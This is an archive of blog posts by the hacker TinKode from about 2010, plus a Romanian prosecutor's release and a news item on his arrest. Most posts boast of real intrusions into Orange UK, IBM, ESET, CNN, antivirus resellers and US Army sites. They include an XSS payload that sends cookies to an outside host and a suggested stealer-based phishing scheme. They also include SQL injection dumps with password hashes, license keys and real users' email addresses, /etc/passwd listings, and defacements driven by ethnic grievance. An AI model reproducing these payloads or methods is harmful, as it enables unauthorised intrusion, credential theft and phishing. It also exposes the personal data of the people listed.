TinKode-Orange Vulnerable to XSS and phishing

Orange Vulnerable to XSS and phishing

Posted by isrtinkode on February 19, 2010

                       ____                               _    _ _  __
                      / __ \                             | |  | | |/ /
                     | |  | |_ __ __ _ _ __   __ _  ___  | |  | | ' /
                     | |  | | '__/ _` | '_ \ / _` |/ _ \ | |  | |  <
                     | |__| | | | (_| | | | | (_| |  __/ | |__| | . \
                      \____/|_|  \__,_|_| |_|\__, |\___|  \____/|_|\_\
                                              __/ |
                                             |___/
                                            # TinKode & La Magra@ Romania

XSS – [Cross-Site Scripting]
Informations:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy…
More here: [ XSS ]
I just found a XSS vulnerability in website.orange.co.uk website.
Through this vulnerability, an attacker could inject HTML or JavaScript code which may lead to cookie stealing.
Proof of Concept:

Link:

http://censored/index.php?module=censored=">censored  src=javascript:censored="http://censored?censored="+document.censored+"&censored")></censored>

c0de:

"><censored" src=javascript:censored="http://censored.site.com/censored.php?censored="+document.censored>

We can encode the malicous code in base64, hex, etc in order to hide our intentions!
Another example for this vulnerability is phishing!
As everyone knows, there are programs called stealer which can steal all saved passwords from your browser.
I picked a executable program (winamp in our case) for a demonstration.
Link to download winamp: http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe
The malicious code:

"><censored  src="http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe">censored

Encoded in hex will become:

http://website.orange.co.uk/censored

Replace the winamp link with another one(eg: a stealer) and you can trick a lot of people.
Note: This isn’t the only vulnerability which I found in : orange.co.uk
#Tinkode

Read More

TinKode-Avast,Avira,Nero Full Disclosure Accounts Exposed

Avast,Avira,Nero Full Disclosure Accounts Exposed

Posted by isrtinkode on February 28, 2010

                       _                  _             _   _
    /\                | |       /\       (_)           | \ | |
   /  \__   ____ _ ___| |_     /  \__   ___ _ __ __ _  |  \| | ___ _ __ ___
  / /\ \ \ / / _` / __| __|   / /\ \ \ / / | '__/ _` | | . ` |/ _ \ '__/ _ \
 / ____ \ V / (_| \__ \ |_ _ / ____ \ V /| | | | (_| |_| |\  |  __/ | | (_) |
/_/    \_\_/ \__,_|___/\__( )_/    \_\_/ |_|_|  \__,_( )_| \_|\___|_|  \___/
                          |/                         |/
                                     #TinKode & Jackhax0r @ Full Disclosure

Informations:

Company Miam-Veri d.o.o is a representative of avast! products for the Republic of Croatia.
Miam-Veri d.o.o. is reseller for Avast! Antivirus, GFI Software, Adobe and Nero VLP.
Avira Antivirus
Avast! – Computer virus, worm and Trojan protection
GFI – Fax server, Exchange and network software
Adobe – Print, design and publishing software
Nero VLP – All-In-One Digital Media Solutions

Vulnerable links:

Avast: http://www.avast.software.hr/detalji.asp?ID=9
GFI: http://gfi.software.hr/detalji.asp?ID=7
Nero: http://nero.software.hr/detalji.asp?ID=67
Avira: http://avira.software.hr/detalji.asp?ID=6

Testing:

Main Informations:

[*]Version = Microsoft SQL Server 2005 – 9.00.4053.00 (Intel X86) May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
[*]Current User = censored
[*]Current Database = censored
[*]Server = Microsoft-IIS/6.0

Screen:

All Databases (46):

censored
master
tempdb
model
msdb
ASPNETDB
dnn_zupa
GalaTest
hram-zdravlja-dnn
codeit
tiashop
radio_ivanec_hr_dnn
gipsmont-cosic
drvodjelac_hr_dnn
hps_hr_dnn
moto_gume_com_vs
kridom2
kridomhr
EMOS_ZG
Nekretnine
nnmkor
oglasnik
emitri_hr_emitri
24sata2
novi-informatorProduction
rideatrain
mdosobnidnevnik
CY_2008
CYRacuni
testMISO3
croatia_rab_net_katalog
dracomerx_hr_CompanyWeb
mojkompjuter_com_mojkompjuter
lglas
motoklub_cms
POSLOVNIPROSTOR
vs-baterije
rituals
FRIGOTEHNIKA
knjiga
shop_manitabo_com_vs
bednja_hr_baza
9A4DK_com_dnn
TicketTool
split_itportal_com_CompanyWeb
vs-marjan-tisak

Tables from main database “censored“:

DJELATNOSTI
FINTAB
Komentar
KomentarPoslovanja
KontrolaNaloga
KontrolaNalogaPojedinac
KontrolaNalogaTemp
Limiti
LOG
OBRASCI
OBVEZNIK
OPCI1
OPCI2
OPERATERI
POGRESKE
Pokazatelji
PonudeHyperion2
PonudeH
TA
TAB_ZAG
TABBC101
TABBC102
TABBC103
TABDE101
TABDE102
TABDE103
TABLICE
ZAGLAV
TFI-POD
vVrijednosnica
vVrijednosnicaTFI
AvastAdmin
AvastTecaj
AvastTempNar
AvastKategorije
AvastNarproizvod
AvastNarudzbe
AvastNaslovna
AvastProgrami
KontniPlan
Racuni
RacuniDet
Ponude
PonudeDet
AviraKategorije
AviraPopis
AvastPopis
AvastProizvodi
AviraProizvodi
AvastIsplata
NeroKategorije
NeroProizvodi
AvastKorisnici
Kupci
AvastKupci

Columns from table “censored“:

Username: censored
Password:censored

OMG! WTF IS THAT? O_o
Accounts from “censored“:
Username : Password : Email

censored–censored–avast@software.hr
censored–censored–info@infoplanet.hr
censored–censored–eksa-bit@ri.t-com.hrcensored–censored–brkaric@gmail.com
censored–censored–kontakt@aero-racunala.hr
censored–censored–info@diskont24.com
censored–censored–damir@node.hr
censored–censored–info@najkomp.hr
censored–censored–servis@ultimus.hr; shop@ultimu
censored–censored–amisa@amisa.hr
censored–censored–info@vobis.hr
censored–censored–partner.avast@signon.hr
censored–censored–fran.baca@knjigice.com
censored–censored–info@chloris-informatika.hr
censored–censored–olicomp@optinet.hr
censored–censored–instar@instar-informatika.hr
censored–censored–magazinrs@magazinrs.hr
censored–censored–kreso@cio.hr
censored–censored–edrazenovic@gmail.com
censored–censored–alen@besoft.hr
censored–censored–mprahin@gmail.com
censored–censored–1990ivan.maric@gmail.com
censored–censored–tspinjac@gmail.com
censored–censored–optima@optima-zadar.hr
censored–censored–hturcin@hotmail.com
censored–censored–danko@adm.hr
censored–censored–mpasicko@gmail.com
censored–censored–faithfry@gmail.com
censored–censored–sasa.jovanovic@inet.hr
censored–censored–prut@email.com
censored–censored–dsajcic@gmail.com
censored–censored–marko.pecatnik@gmail.com
censored–censored–dominik.dusak@gmail.com
censored–censored–valter.stemberga2@gmail.com
censored–censored–slavica.zubak@hotmail.com
censored–censored–hrvoje.humski@gmail.com
censored–censored–antonio@software.hr
censored–censored–info@studio-slatina.hr
censored–censored–damir.hlaj@ka.t-com.hr
censored–censored–frediienator@gmail.com
censored–censored–bojan.podnar@gmail.com
censored–censored–igorkolar25@gmail.com
censored–censored–zlajamaxi@gmail.com
censored–censored–grimir69@net.hr
censored–censored–npavic_82@yahoo.com
censored–censored–albukvic@gmail.com
censored–censored–dlistes@gmail.com
censored–censored–stzizic@gmail.com
censored–censored–samuel.koprivnjak@gmail.com
censored–censored–marin.farkas@gmail.com
censored–censored–tomislav.parcina@gmail.com
censored–censored–vklen@net.hr
censored–censored–dlonjak@ffos.hr
censored–censored–osjecko2@gmail.com
censored–censored–miro.sertic@email.t-com.hr
censored–censored–milolozaantonio@yahoo.com
censored–censored–jogalic@gmail.com
censored–censored–robimlinar@gmail.com
censored–censored–josip.crnicki@gmail.com
censored–censored–antisa1@optinet.hr
censored–censored–braneweb@gmail.com
censored–censored–ninovukic@gmail.com
censored–censored–e.one@post.t-com.hr
censored–censored–fran.jadrijev@hotmail.com
censored–censored–houseboki@gmail.com
censored–censored–som@somware.hr
censored–censored–info@studio-bonet.com
censored–censored–skydiver.extreme@gmail.com
censored–censored–nik238@net.hr
censored–censored–odiriuss@gmail.com
censored–censored–mario44@net.hr
censored–censored–marina.velat@gmail.com
censored–censored–nikolavlacic@gmail.com
censored–censored–eomersblood@gmail.com
censored–censored–doris.fiume@gmail.com
censored–censored–vjeran555@yahoo.com
censored–censored–dumbovic@gmail.com
censored–censored–shogo.cro@gmail.com
censored–censored–vanja.rain@hi.t-com.hr
censored–censored–mladen.basic@email.t-com.hr
censored–censored–lahor.enc@sk.htnet.hr
censored–censored–mate.barbaric@gmail.com
censored–censored–mestrovic.ma@gmail.com
censored–censored–Z.HRVOIC@vip.hr
censored–censored–binogrupa@bino.hr
censored–censored–info@pixma-itshop.com
censored–censored–vekkica@hotmail.com
censored–censored–goran.nxn@gmail.com
censored–censored–castoos@gmail.com
censored–censored–brkcomp@brkcomp.hr
censored–censored–ivanvalentic81@gmail.com
censored–censored–ivan.cajkovac@gmail.com
censored–censored–binder.jo@gmail.com

[LOL]
So, all official reprezentative websites of Avast, Avira, Nero, GFI created by Miam-Veri D.O.O are vulnerable!
Great!
~TinKode
~Never forgot the power of silence!

Read More

TinKode-IBM Full Disclosure SQL Injection

IBM Full Disclosure SQL Injection

Posted by isrtinkode on March 4, 2010

#TinKode & skpx & begood

About IBM:

International Business Machines (NYSE: IBM), abbreviated IBM, is a multinational computer, technology and IT consulting corporation headquartered in Armonk, North Castle, New York, United States. The company is one of the few information technology companies with a continuous history dating back to the 19th century. IBM manufactures and sells computer hardware and software (with a focus on the latter), and offers infrastructure services, hosting services, and consulting services in areas ranging from mainframe computers to nanotechnology.
IBM has been well known through most of its recent history as the world's largest computer company and systems integrator. With over 407,000 employees worldwide, IBM is the largest and most profitable information technology and services employer in the world according to the Forbes 2000 list with sales of greater than 100 billion US dollars. IBM holds more patents than any other U.S. based technology company and has eight research laboratories worldwide. The company has scientists, engineers, consultants, and sales professionals in over 200 countries.

Vulnerable website:www.researcher.ibm.com

Version: 5.0.67
User: censored
Database: researcher_development
Datadir: /Applications/ censored /var/mysql/

All databases:

information_schema
bluebase
cdcol
mysql
researcher_development
test

Tables from main database “researcher_development“:

group_types
groups
locations
navbar_entries
publication_authors
publications
redirects
research_areas
researcher_group_entries
researcher_navbar_entries
researchers

Tables from “bluebase” database:

activity
auth_group
auth_group_permissions
auth_message
auth_permission
auth_user
auth_user_groups
auth_user_user_permissions
bluecomments_bluecomment
bluecomments_bluekarmascore
bluecomments_bluemoderatordeletion
bluecomments_blueuserflag
comments_comment
comments_freecomment
comments_karmascore
comments_moderatordeletion
comments_userflag
django_admin_log
django_content_type
django_session
django_site
projects_appacademy08
projects_application
projects_application_members
projects_application_moderators
projects_application_restrict
projects_appspeaker
projects_changelog
projects_document
projects_notespubdb
projects_patent
projects_patent_authors
projects_person
projects_pic
projects_pic_chairs
projects_project
projects_project_application
projects_project_contacts
projects_project_docs
projects_project_linemanagers
projects_project_members
projects_project_pics
projects_project_reviewers
projects_project_tags
projects_publication
projects_publication_authors
projects_pubstat
projects_restriction
projects_restriction_access_list
projects_tag
projects_useractivity
tag
tagged_item
votes

Accounts from “auth_user” table:

censored: sha1 censored  | hash cracked:  censored 
censored: sha1 censored   | hash cracked: censored

The account from “mysql.user“:

root : *F9F9C3D7DD04044668ABBFA629CE289E02F7A918 | hash cracked: 
censored

Here we can see the “ censored “:

# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# This file will not be consulted for authentication unless the BSD local node
# is enabled via /Applications/Utilities/Directory Utility.app
#
# See the DirectoryService(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
_lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false
_postfix:*:27:27:Postfix Mail Server:/var/spool/postfix:/usr/bin/false
_mcxalr:*:54:54:MCX AppLaunch:/var/empty:/usr/bin/false
_pcastagent:*:55:55:Podcast Producer Agent:/var/pcast/agent:/usr/bin/false
_pcastserver:*:56:56:Podcast Producer Server:/var/pcast/server:/usr/bin/false
_serialnumberd:*:58:58:Serial Number Daemon:/var/empty:/usr/bin/false
_devdocs:*:59:59:Developer Documentation:/var/empty:/usr/bin/false
_sandbox:*:60:60:Seatbelt:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_ard:*:67:67:Apple Remote Desktop:/var/empty:/usr/bin/false
_www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false
_eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false
_cvs:*:72:72:CVS Server:/var/empty:/usr/bin/false
_svn:*:73:73:SVN Server:/var/empty:/usr/bin/false
_mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false
_cyrus:*:77:6:Cyrus Administrator:/var/imap:/usr/bin/false
_mailman:*:78:78:Mailman List Server:/var/empty:/usr/bin/false
_appserver:*:79:79:Application Server:/var/empty:/usr/bin/false
_clamav:*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false
_amavisd:*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false
_jabber:*:84:84:Jabber XMPP Server:/var/empty:/usr/bin/false
_xgridcontroller:*:85:85:Xgrid Controller:/var/xgrid/controller:/usr/bin/false
_xgridagent:*:86:86:Xgrid Agent:/var/xgrid/agent:/usr/bin/false
_appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false
_windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false
_spotlight:*:89:89:Spotlight:/var/empty:/usr/bin/false
_tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false
_securityagent:*:92:92:SecurityAgent:/var/empty:/usr/bin/false
_calendar:*:93:93:Calendar:/var/empty:/usr/bin/false
_teamsserver:*:94:94:TeamsServer:/var/teamsserver:/usr/bin/false
_update_sharing:*:95:-2:Update Sharing:/var/empty:/usr/bin/false
_installer:*:96:-2:Installer:/var/empty:/usr/bin/false
_atsserver:*:97:97:ATS Server:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

That it’s all!
@TinKode

Read More

TinKode-ESET NOD32 Hong Kong Hacked

ESET NOD32 Hong Kong Hacked

Posted by isrtinkode on March 21, 2010

#NOD32 Hong Kong@ VMw4r3 & TinKode

Screenshot:

#cat /etc/passwd

bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
v2admin:x:500:500::/home/v2admin:/bin/bash
nod32:x:501:501::/var/www/html:/bin/bash
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
uploadfile:x:501:501::/var/www/html/UpFile:/bin/bash

NOD32 URL: http://www.eset.hk/templates_c/
Zone-h URL: http://zone-h.org/mirror/id/10409367

“Simple but powerfull!“
* We have not changed anything
Thanks!

Read More

TinKode-ESET NOD32 Taiwan Full Disclosure

ESET NOD32 Taiwan Full Disclosure

Posted by isrtinkode on March 22, 2010

#NOD32 Taiwan@ TinKode - Romania

About ESET:
ESET is an IT security company headquartered in Bratislava, Slovakia that was founded in 1992 by the merger of two private companies. The company is privately held and has branch offices in San Diego, California; Wexford, Ireland; London, United Kingdom; Buenos Aires, Argentina; Prague, Czech Republic and Kraków, Poland.
Vulnerable website: www.eset.com.tw to MySQL Injection.

Main Informations:

• Version : 5.0.45
• Database: nod32twnew
• Datadir : /var/lib/mysql/
• User    : censored

Databases:

• information_schema
• mysql

• nod32twnew

Tables from main database:

• article
• category
• enterprise_apply
• estore_product
• estore_product_20100106
• estore_product_category
• estore_product_category_20100106
• estore_product_copy
• faq_category
• faq_category_detail
• game3
• manager
• nodtwflash1
• register
• regkeyreplace
• trial30
• updates

We have permission to access mysql.user accounts:

MySQL.user account:

• censored  :  censored

Accounts from manager table:

• admin    :  censored
• editor   :  censored
• nod32@tw :  censored
• soman    :  censored

The accounts are in plain-text… great!
Now some keys from “ censored key censored “:

• J102- censored :J112- censored
• J102- censored :J112- censored
• J102- censored :J112- censored
• J102- censored :J112- censored
• J102- censored :J112- censored
• J102- censored :J112- censored
• J102- censored :J112- censored
• J102- censored :J112- censored
• J102- censored :J112- censored
• …

~Verry simple!
Other webservers of ESET NOD32 hacked: NOD32 Hong Kong & NOD32 Romania
~Thanks, TinKode

Read More

TinKode-Daily Telegraph websites hacked

Daily Telegraph websites hacked

Posted by isrtinkode on April 15, 2010

The ‘Romanian National Security’ logo on the Telegraph’s hacked site

Part of the Daily Telegraph‘s website has been hacked, apparently by people in Romania who were aggrieved at its identification of “gypsies” and “Romanians”.
Its “Short Breaks” and Wine And Dine sections were both hacked, with the Short Breaks site still up at 12.55pm today, with a picture of a Romanian flag claiming to be for the “Romanian National Security”, some comments in Romanian and the remark in English at the bottom that “Guess what, gypsies aren’t romanians, morons.” It also links to a Russian site which plays an MP3 called The Lonely Shepherd.
Sunbelt Software, which first noticed the hack, said that it had alerted the Telegraph when it noticed the hack.
The method used to hack into the site is not known. Chris Boyd, a researcher at Sunbelt, said that a translation of the text from the page says that the hackers are “sick of seeing garbage like this … calling us Romanians ‘gypsies’.” It also attacks Britain for “broadcasting shitty TV programs like Top Gear”.
But Boyd said that the group is apparently unknown even among Romanian hackers – suggesting that it may be one person with a grievance against the Telegraph.
In March 2009 the Telegraph’s system was also hacked, exposing the email addresses of registered users on part of its site. That hack also seems to have been done by a Romanian hacker – suggesting that the site has become a target.
A later posting in May on the Hackersblog site suggested that there was a weakness on the Telegraph site that allowed it to be hacked repeatedly.

Read More

TinKode-US Army Medical Department Regiment

US Army Medical Department Regiment Hacked

Posted by isrtinkode on April 15, 2010

About U.S. Army Medical Department:

The U.S. Army Medical Department was formed on 27 July, 1775, when the Continental Congress authorized a Medical Service for an army of 20,000 men. It created the Hospital Department and named Dr. Benjamin Church of Boston as Director General and Chief Physician. On 14 April, 1818 the Congress passed an Act which reorganized the staff departments of the Army. The Act provided for a Medical Department to be headed by a Surgeon General. Dr. Joseph Lovell, appointed Surgeon General of the United States Army in April 1818, was the first to hold this position in the new organization. The passage of this law marks the beginning of the modern Medical Department of the United States Army.
….
This web site been designed to provide you with useful information about the U.S. Army Medical Department (AMEDD) Regiment. Through this web site, you will learn the history of the AMEDD Regiment, the symbolism behind our heraldic items, how to wear the Regimental Distinctive insignia, and various programs available to you and your unit.

URL: http://ameddregiment.amedd.army.mil

Read More

TinKode-(metc.mil)Hacked

(metc.mil) Medical Education & Training Campus Hacked

Posted by isrtinkode on April 15, 2010

ScreenShot:

Link: www.metc.mil
Full Disclosure!
About:

The Joint Medical Education and Training Campus at Fort Sam Houston in Texas is to be the military’s primary site for joint and service specific health care education and training. The Center will effectively consolidate five separate major learning institutions at a single location, and will provide medical personnel from the Army, Air Force, and Navy with both a standard medical core curriculum as well as courses specific to each service.
The center will be the largest military medical education and training institution in the world and its creation is expected to be the largest consolidation of service training in the history of the United States Department of Defense, with more than 9,000 active duty students from all three services being trained at any given time. An estimated 32,000 personnel will be trained at the facility annually.
Health care training activities will be consolidated from a variety of locations across the United States, to include Walter Reed Army Medical Center and Bethesda Naval Medical Center, Naval Medical Center San Diego, Naval Station Great Lakes, Sheppard Air Force Base, and Naval Medical Center Portsmouth.

Read More

TinKode-LeMonde.fr

LeMonde.fr @ (Hacked) Romanian National Security

Posted by isrtinkode on April 19, 2010

Saved on zone-h:

http://zone-h.org/mirror/id/10560479

The subdomain defaced:

http://planete-plus-intelligente.lemonde.fr

Screenshot:

Mesajul este destul de clar (The message):

Aceasta nu este o miscare de rezistenta, un protest, sau o revolta!

Este strigatul întregului popor român ce face apel la fratii nostri care au uitat ca si în venele noastre circula un sânge roman.

Sângele ce-a fost jertfit si varsat pe câmpurile de lupta pentru a fi scrisa istoria neamului nostru cere acum DREPTATE.

Eroii patriei noastre nu vor muri niciodata! Vrem sa nu se uite CINE l-a varsat pentru ca România sa existe astazi pe harta,

sa le amintim copiilor si nepotilor nostri, sa îi respectam cu onoarea cuvenita. Ne-a ajuns atâta batjocura.

Tiganii nu sunt Români! Nu ei ne-au scris istoria!

Când vorbiti despre compatriotii nostri nu mai folositi expresiile “Tigani Români”.

Noi v-am respectat Franta, voi ne veti respecta ROMÂNIA!

R.N.S. VEGHEAZA pentru ca aceste lucruri sa fie înfaptuite..

———————————————————
Cu putine zile in urma tot aceasta echipa necunoscuta pana acum (RNS – Romanian National Security) a mai transmis tot prin aceasi “metoda” un mesage destul de dur celor de la The Daily Telegraph.
Personal, din cate observ acesti baieti au ceva cu toate tarile care au stricat imaginea Romaniei.
Nu incurajez asemenea lucruri, dar unii chiar o merita!
———————————————————-
Sursa: www.hackersblog.org
———————————————————-

Read More

TinKode-WhiteHouse.gov XSS Vulnerability

WhiteHouse.gov XSS Vulnerability

Posted by isrtinkode on April 25, 2010

WhiteHouse.gov XSS Vulnerability
POC:
https://app2.whitehouse.gov/*******?height=200&width=300&urlloc=”><script>alert(document.cookie)</script>
Screen:

Note: You can’t do much with that, but it’s a vulnerability anyway!

Read More

TinKode-Romanian National Security

RNS – Romanian National Security – Italy

Posted by isrtinkode on May 1, 2010

The group of Romanian hacktivists calling themselves Romanian National Security (RNS) have attacked and defaced multiple websites belonging to the biggest Italian public television company Radiotelevisione Italiana (RAI), as well as leading Italian newspapers La Stampa and Corriere della Sera. The message left behind on the hacked Web properties condemns the association of the Romanian people with the Romani ethnic group, commonly referred to as gypsies.
RNS is a group of Romanian nationalist hackers who appear to have taken issue with how some international publications depict Romania and its people. Their initial hit was carried out earlier this month against renowned British newspaper The Daily Telegraph and resulted in the defacement of two websites hosted under the telegraph.co.uk domain.
A week later, the group retaliated in a similar fashion against reputable French newspaper Le Monde for a joke made by humorist Jonathan Lambert during a TV show on national television. The staged performance, which had Lambert present the so-called “new Romanian salute” by imitating a beggar with his hand raised, was strongly criticized in Romania for being offensive and racist.
Romanian security blog HackersBlog reports that www.citizenreport.rai.it, a community website owned and operated by the Italian public service broadcaster RAI, was hacked by members of the RNS via SQL injection. The hackers left behind a message, expressing anger at the local media.
The attacks on Italian publications continued with complete defacements of tuttoaffari.lastampa.it and citymusiclab.city.corriere.it/eventi/, two websites belonging to La Stampa and Corriere della Sera, respectively. At the time of writing this article, the index pages of both sites display a shield logo in the colors of the Romanian flag and the same threatening message used in the Radiotelevisione Italiana hack.
“It’s time to close our fingers into a fist and unforgivingly strike as many times as need be, for you to reap the harvest of your lies. We promise you will not forget about Romania and her past again. We, descendants of Trajan and Decebalus, are not a nation of gypsies! We have run out of patience and, in the name of Romanians everywhere, we warn that if you don’t stop presenting our entire people as Romani or gypsies, even more tricolor flags [reference to Romania's red, yellow and blue flag] will be raised; until all untruths are exposed and apologies are issued,” the message signed by RNS reads.
A Romanian saying, roughly translating into “Eagles may occasionally fly lower than chickens, but chickens will never soar in the sky,” is displayed at the bottom, while Ciprian Porumbescu’s Ballad for Violin and Orchestra plays in the background.
Mirrors of the defaced websites are available via MirrorTurk for the RAI and Corriere della Sera attacks and Zone-H for the La Stampa one. According to HackersBlog, RNS members also found vulnerabilities on lordine.it, storialibera.it, giornaledicalabria.it, unita.it, pontediferro.org and momentosera.it, but these websites have not yet been defaced.
Source: http://news.softpedia.com/news/Romanian-Nationalists-Hit-Several-Italian-Media-Outlets-141062.shtml
Antena 1:

Read More

TinKode-www.stanley.army.mil Hacked

www.stanley.army.mil Hacked

Posted by isrtinkode on May 2, 2010

URL: http://www.stanley.army.mil
Informations: FTP Access
Method: SQL Injection
Screenshot: http://img697.imageshack.us/img697/9268/wwwstanleyarmymil.png

Read More

TinKode-dns.amedd.army.mil OwNeD

dns.amedd.army.mil OwNeD

Posted by isrtinkode on May 12, 2010

Department of Nursing Science

Link: http://www.dns.amedd.army.mil
Screenshot: http://img687.imageshack.us/img687/6968/dnsameddarmymil.png
Information: FTP Access
Method of attack: Unkn0wn
About:

The mission of the Department of Nursing Science is to coordinate and conduct education and training for resident officer and enlisted courses for which Department of Nursing Science is the proponent or nursing-specific liaison; to pursue state of the art training technology for all courses; to develop and oversee the conduct of distributed training courses for which Department of Nursing Science is the proponent; to serve as nursing subject matter expert for nursing issues and for doctrine developed under the proponency of the AMEDD Center and School.

Read More

TinKode-COMUNICAT DE PRESĂ DIICOT

COMUNICAT DE PRESĂ

31.01.2012

        Procurorii Direcţiei de Investigare a Infracţiunilor de Criminalitate Organizată şi Terorism – Structura Centrală efectuează cercetări faţă de învinuitul Cernăianu Manole Razvan în vârstă de  20 de  ani, din municipiul Timişoara, sub aspectul  săvârşirii infracţiunilor de acces fără drept la sisteme informatice, prin încălcarea măsurilor de securitate şi în scopul obţinerii de date informatice, transfer neautorizat de date dintr-un sistem informatic şi perturbarea gravă a funcţionării unui sistem informatic,  prev. de art. 42 alin. 1, 2,  art. 44 alin. 2 şi art. 45 din Legea nr. 161/2003. 

         În sarcina învinuitului se reţine că a lansat atacuri informatice  şi a accesat fără drept mai multe servere aparţinând armatei Statelor Unite ale Americii, în scopul obţinerii de date confidenţiale, pe care le-a copiat şi transferat în mod neautorizat în propriul sistem informatic.

        Învinuitul a procedat la postarea şi divulgarea respectivelor date informatice către public prin intermediul unui jurnal tip blog şi pe un site web.

        Prin acelaşi mod de operare, învinuitul a compromis şi server-ul web aparţinând National Aeronautics and Space Administration (N.A.S.A.).

        În sarcina învinuitului se mai reţine că a accesat în mod neautorizat, lansând atacuri informatice  asupra sistemului informatic şi paginii de web aparţinând Guvernului SUA, respectiv Departamentului de Apărare - Pentagon.

        În acest scop, învinuitul a conceput un program/aplicaţie informatică, pe care l-a şi oferit spre comercializare pe blog-ul personal, unde a postat şi o înregistrare video care a surprins atacurile informatice exercitate asupra site-ului oficial al administraţiei americane.

        Prin activitatea infracţională, s-a produs blocarea temporară a sistemelor informatice atacate, restricţionându-se astfel accesul la acestea şi perturbându-se în mod grav buna lor funcţionare.

        Procurorii DIICOT colaborează în instrumentarea cauzei cu autorităţile judiciare americane – FBI şi cu reprezentanţii NASA.

        Cercetările sunt  efectuate cu sprijinul ofiţerilor de poliţie judiciară din cadrul DCCO.

        Suportul tehnic şi informati este asigurat de către DOS.

Read More

TinKode-CNN vulnerable to SQL Injection

Posted by isrtinkode on February 20, 2010

CNN

Vulnerable to Oracle Injection
#TinKode & skpx

CNN.com is among the world's leaders in online news and information delivery. Staffed 24 hours, seven days a week by a dedicated staff in CNN's world headquarters in Atlanta, Georgia, and in bureaus worldwide, CNN.com relies heavily on CNN's global team of almost 4,000 news professionals. CNN.com features the latest multimedia technologies, from live video streaming to audio packages to searchable archives of news features and background information. The site is updated continuously throughout the day.

Website vulnerable: cgi.money.cnn.com
Link:

http://cgi.money.cnn.com/tools/fortune/compare_2009.jsp?censored

Informations:

Version : Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production

 censored: censored

 censored: censored

Owner : SYS

Columns from censored

[1] RANK
[2] COMPANY_ID
[3] NAME
[4] REVENUE
[5] REVENUE_GROWTH
[6] PROFIT
[7] PROFIT_GROWTH
[8] PROF_PCT_REVENUE
[9] PROF_PCT_ASSETS
[10] PROF_PCT_EQUITY
[11] EPS_10YR_GROWTH
[12] TRI_10YR
[13] TRI
[14] EMPLOYEES
[15] EMPLOYEE_GROWTH

# Thanks, and have a nice day!
# TinKode

Read More

Hackerul TinKode

Hackerul TinKode, acuzat de spargerea serverelor Armatei SUA, NASA şi Pentagonului, a fost arestat de Judecătoria sectorului 5 Bucureşti, care a admis cererea procurorilor Direcţiei de Investigare a Infracţiunilor de Criminalitate Organizată şi Terorism (DIICOT).

Hackerul ce a atacat serverele Armatei Statelor Unite, ale NASA (National Aeronautics and Space Administration) şi Pentagonului (sediul central al Departamentului Armatei) este student la facultatea de Informatică din Timişoara.

Răzvan Manole Cernăcianu are 20 de ani, el fiind identificat de autorităţile judiciare americane, împreună cu cele române, ca hackerul TinKode.

"Procurorii Direcţiei de Investigare a Infracţiunilor de Criminalitate Organizată şi Terorism - Structura Centrală efectuează cercetări faţă de o persoană în vârstă de 20 de ani, din municipiul Timişoara, sub aspectul săvârşirii infracţiunilor de acces fără drept la sisteme informatice, prin încălcarea măsurilor de securitate şi în scopul obţinerii de date informatice, transfer neautorizat de date dintr-un sistem informatic şi perturbarea gravă a funcţionării unui sistem informatic", precizează DIICOT, într-un comunicat remis agenţiei MEDIAFAX.

Potrivit DIICOT, tânărul ar fi lansat atacuri informatice şi ar fi accesat fără drept mai multe servere aparţinând armatei Statelor Unite ale Americii, în scopul obţinerii de date confidenţiale, pe care le-ar fi copiat şi transferat în mod neautorizat în propriul sistem informatic.

